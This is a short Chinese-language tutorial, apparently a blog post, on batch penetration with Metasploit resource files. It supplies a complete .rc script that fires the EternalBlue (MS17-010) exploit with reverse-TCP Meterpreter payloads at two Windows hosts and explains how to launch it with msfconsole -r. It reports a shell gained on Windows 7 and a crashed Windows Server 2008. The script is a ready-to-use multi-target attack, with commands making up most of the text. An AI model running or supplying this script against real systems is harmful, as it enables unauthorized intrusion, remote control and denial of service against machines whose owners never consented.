使用msf资源文件进行多目标渗透

如果我们要渗透多个主机,显然用之前单个目标方法是不行的,因此我们需要用到msf文件,msf文件是一个文本文件,其中包括了msfconsole中执行的一系列命令。

直接在桌面输入gedit 文件名.rc ,输入如下msf命令进行永恒之蓝漏洞的批量利用,代码将测试一台windows7,一台window server2008

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.16.6.129
set lhost 172.16.6.134
set lport 4444
exploit -j
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.16.6.132
set lhost 172.16.6.134
set lport 4445
exploit -j
注意:lport必须指定为不同的端口,以便本机进行多个端口接收不同的会话

然后使用msfconsole -r 文件名.rc调用,-r参数指的是加载资源文件,资源文件将按照顺序进行漏洞利用,一旦第一个利用完成,explot -j参数将正在运行的漏洞移动到后台进行第二个漏洞利用,直到所有漏洞利用完成,我们就可以看到多个shell。

漏洞利用结束后我们看到,windows7已经获得了shell,而windows server 2008蓝屏。

You may also like...